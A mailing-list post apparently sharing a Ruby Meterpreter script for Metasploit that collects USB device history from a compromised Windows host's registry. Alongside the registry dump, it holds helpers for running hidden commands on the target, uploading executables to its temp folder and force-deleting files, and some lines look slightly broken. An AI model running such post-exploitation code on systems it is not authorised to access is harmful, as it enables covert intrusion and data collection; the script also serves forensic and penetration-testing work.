Hi Carlos,
Below is the code for my script.
Thanks,
Jim
#
# This is a Meterpreter script designed to be used by the Metasploit Framework
#
# Meterpreter script for pulling forensics data from the registry for any USB device
# connected to the system
#
# Provided by Dimitrios Kapsalis
# Version: 0.1
require 'fileutils'
#Function for writing data to a file
def m_filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each_line do |d|
output.puts(d)
end
output.close
end
#
====================================================================================================================================
# Checking for UAC
#
====================================================================================================================================
def m_uaccheck(session)
uac = false
winversion = session.sys.config.sysinfo
if winversion['OS']=~ /Windows Vista/ or winversion['OS']=~ /Windows 7/
if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
begin
print_status("Checking if UAC is enabled .....")
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE,
'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
if key.query_value('Identifier') == 1
print_status("UAC is Enabled")
uac = true
end
key.close
rescue::Exception => e
print_status("Error Checking UAC: #{e.class} #{e}")
end
end
end
return uac
end
#
====================================================================================================================================
# Print message to file on target
#
====================================================================================================================================
def m_writetofile(session,file,message)
cmd = "cmd /c echo #{message} >> #{file}"
m_exec(session, cmd)
end
#
====================================================================================================================================
# Delete a file (meterpreter has no unlink API yet)
#
====================================================================================================================================
def m_unlink(session, path)
r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil,
{'Hidden' => 'true'})
while(r.name)
select(nil, nil, nil, 0.10)
end
r.close
end
#
====================================================================================================================================
# Exec a command and return the results
#
====================================================================================================================================
def m_exec(session, cmd)
begin
r = session.sys.process.execute(cmd, nil, {'Hidden' => true,
'Channelized' => true})
b = ""
while(d = r.channel.read)
b << d
end
r.channel.close
r.close
b
rescue ::Exception => e
print_status("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
#
====================================================================================================================================
# Function to upload files
#
====================================================================================================================================
def m_upload(session,file)
location = session.fs.file.expand_path("%temp%")
fileontrgt = "#{location}\\#{rand(100)}.exe"
print_status(" -- Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status(" -- #{file} uploaded!")
print_status(" -- File on target #{fileontrgt}")
return fileontrgt
end
#
====================================================================================================================================
# Function to download files
#
====================================================================================================================================
def m_download(session,src,dst)
location = session.fs.file.expand_path("%temp%")
print_status(" -- Downloading #{src}....")
session.fs.file.download_file("#{dst}","#{src}")
print_status(" -- #{dst} downloaded!")
end
#
====================================================================================================================================
# Script proper
#
====================================================================================================================================
# The 'client' object holds the Meterpreter session
# Aliasing here for plugin compatibility
session = client
script_name = "installedsoftware"
# Extract the host and port
host,port = session.tunnel_peer.split(':')
print_status("New session on #{host}:#{port}...")
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs',script_name , host +
"_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)) )
# Create the log directory
::FileUtils.mkdir_p(logs)
print_status("-- Files saved to #{logs}...")
location = session.fs.file.expand_path("%temp%")
filename = "#{rand(100)}.dat"
fileontrgt = "#{location}\\#(unknown)"
print_status("-- Data logged to #{fileontrgt}....")
begin
#===============================================================================================================================
#===============================================================================================================================
#===============================================================================================================================
# Pull USB history Pull USB history Pull USB history Pull USB history
Pull USB history Pull USB history Pull USB history
#===============================================================================================================================
#===============================================================================================================================
#===============================================================================================================================
#===========================================================================================
# Dump USB device history
#===========================================================================================
key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR"
root_key, base_key = session.sys.registry.splitkey(key)
log = "#{logs}\\installedusb.txt"
message = ""
message <<
"---------------------------------------------------------------------\n"
message << "Dumping software installed on pc per registry #{key}... \n"
message <<
"---------------------------------------------------------------------\n"
m_filewrt(log, message)
session.sys.registry.create_key(root_key, base_key).each_key() do
|device|
puts device
# =========================================
# ...
# =========================================
session.sys.registry.create_key(root_key,
"#{base_key}\\#{device}").each_key() do |intermediate|
puts intermediate
message = ""
rk = session.sys.registry.open_key(root_key,
"#{base_key}\\#{device}\\#{intermediate}", KEY_READ)
cl = rk.query_value("class")
deviceDesc = rk.query_value("DeviceDesc")
friendlyName = rk.query_value("FriendlyName")
hardwareID = rk.query_value("HardwareID")
rk.close
message << "
========================================================================================================================\n"
message << " Friendly Name : #{friendlyName.data}\n"
message << " - Class : #{cl.data}\n"
message << " - DeviceDesc : #{deviceDesc.data}\n"
message << " - HardwareID : #{hardwareID.data}\n"
hdid = hardwareID.data
ids = hdid.split("USBSTOR")
ids.each do |num|
message << " : USBSTOR#{num}\n"
end
print_status(message)
m_filewrt(log, message)
message = ""
end
end
print_status("...Done!!")
rescue ::Exception => e
print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end
print_status("Completed processing on #{host}:#{port}...")
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com